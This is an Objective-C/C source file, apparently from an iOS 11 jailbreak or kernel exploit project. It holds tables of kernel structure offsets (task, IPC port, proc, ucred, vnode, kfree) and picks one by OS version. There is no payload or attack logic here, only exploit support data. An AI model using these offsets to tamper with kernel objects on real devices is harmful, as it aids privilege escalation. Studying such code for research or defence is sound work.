Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
#import <Foundation/Foundation.h>
2

3
#include <stdio.h>
4
#include <stdlib.h>
5
#include <string.h>
6
#include <sys/sysctl.h>
7
#include <sys/utsname.h>
8

9
#include "koffsets.h"
10
#include "common.h"
11

12
#define LOG(str, args...) do { NSLog(@"[*] " str "\n", ##args); } while(false)
13

14
int* offsets = NULL;
15

16
int kstruct_offsets_11_0[] = {
17
    0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
18
    0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT,
19
    0x14, // KSTRUCT_OFFSET_TASK_ACTIVE,
20
    0x20, // KSTRUCT_OFFSET_TASK_VM_MAP,
21
    0x28, // KSTRUCT_OFFSET_TASK_NEXT,
22
    0x30, // KSTRUCT_OFFSET_TASK_PREV,
23
    0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE
24
    0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,
25
    0x3a8, // KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_ADDR
26
    0x3b0, // KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_SIZE
27
    0x3a0, // KSTRUCT_OFFSET_TASK_TFLAGS
28

29
    0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
30
    0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
31
    0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
32
    0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
33
    0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
34
    0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
35
    0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
36
    0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
37
    0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
38

39
    0x10, // KSTRUCT_OFFSET_PROC_PID,
40
    0x108, // KSTRUCT_OFFSET_PROC_P_FD
41
    0x18, // KSTRUCT_OFFSET_PROC_TASK
42
    0x100, // KSTRUCT_OFFSET_PROC_UCRED
43
    0x8, // KSTRUCT_OFFSET_PROC_P_LIST
44

45
    0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES
46

47
    0x8, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB
48

49
    0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA
50

51
    0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB
52

53
    0x10, // KSTRUCT_OFFSET_PIPE_BUFFER
54

55
    0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE
56
    0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE
57

58
    0xd8, // KSTRUCT_OFFSET_VNODE_V_MOUNT
59
    0x78, // KSTRUCT_OFFSET_VNODE_VU_SPECINFO
60
    0x0, // KSTRUCT_OFFSET_VNODE_V_LOCK
61

62
    0x10, // KSTRUCT_OFFSET_SPECINFO_SI_FLAGS
63

64
    0x70, // KSTRUCT_OFFSET_MOUNT_MNT_FLAG
65

66
    0x10, // KSTRUCT_OFFSET_HOST_SPECIAL
67

68
    0x6c, // KFREE_ADDR_OFFSET
69
};
70

71
int kstruct_offsets_11_3[] = {
72
    0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
73
    0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT,
74
    0x14, // KSTRUCT_OFFSET_TASK_ACTIVE,
75
    0x20, // KSTRUCT_OFFSET_TASK_VM_MAP,
76
    0x28, // KSTRUCT_OFFSET_TASK_NEXT,
77
    0x30, // KSTRUCT_OFFSET_TASK_PREV,
78
    0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE
79
    0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,
80
    0x3a8, // KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_ADDR
81
    0x3b0, // KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_SIZE
82
    0x3a0, // KSTRUCT_OFFSET_TASK_TFLAGS
83

84
    0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
85
    0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
86
    0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
87
    0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
88
    0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
89
    0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
90
    0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
91
    0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
92
    0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
93

94
    0x10, // KSTRUCT_OFFSET_PROC_PID,
95
    0x108, // KSTRUCT_OFFSET_PROC_P_FD
96
    0x18, // KSTRUCT_OFFSET_PROC_TASK
97
    0x100, // KSTRUCT_OFFSET_PROC_UCRED
98
    0x8, // KSTRUCT_OFFSET_PROC_P_LIST
99

100
    0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES
101

102
    0x8, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB
103

104
    0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA
105

106
    0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB
107

108
    0x10, // KSTRUCT_OFFSET_PIPE_BUFFER
109

110
    0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE
111
    0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE
112

113
    0xd8, // KSTRUCT_OFFSET_VNODE_V_MOUNT
114
    0x78, // KSTRUCT_OFFSET_VNODE_VU_SPECINFO
115
    0x0, // KSTRUCT_OFFSET_VNODE_V_LOCK
116

117
    0x10, // KSTRUCT_OFFSET_SPECINFO_SI_FLAGS
118

119
    0x70, // KSTRUCT_OFFSET_MOUNT_MNT_FLAG
120

121
    0x10, // KSTRUCT_OFFSET_HOST_SPECIAL
122

123
    0x7c, // KFREE_ADDR_OFFSET
124
};
125

126
int koffset(enum kstruct_offset offset)
127
{
128
    if (offsets == NULL) {
129
        LOG("need to call offsets_init() prior to querying offsets");
130
        return 0;
131
    }
132
    return offsets[offset];
133
}
134

135
void offsets_init()
136
{
137
    if (kCFCoreFoundationVersionNumber >= 1452.23) {
138
        LOG("offsets selected for iOS 11.3 or above");
139
        offsets = kstruct_offsets_11_3;
140
    } else if (kCFCoreFoundationVersionNumber >= 1443.00) {
141
        LOG("offsets selected for iOS 11.0 to 11.2.6");
142
        offsets = kstruct_offsets_11_0;
143
    } else {
144
        LOG("iOS version too low, 11.0 required");
145
        exit(EXIT_FAILURE);
146
    }
147
}
148

149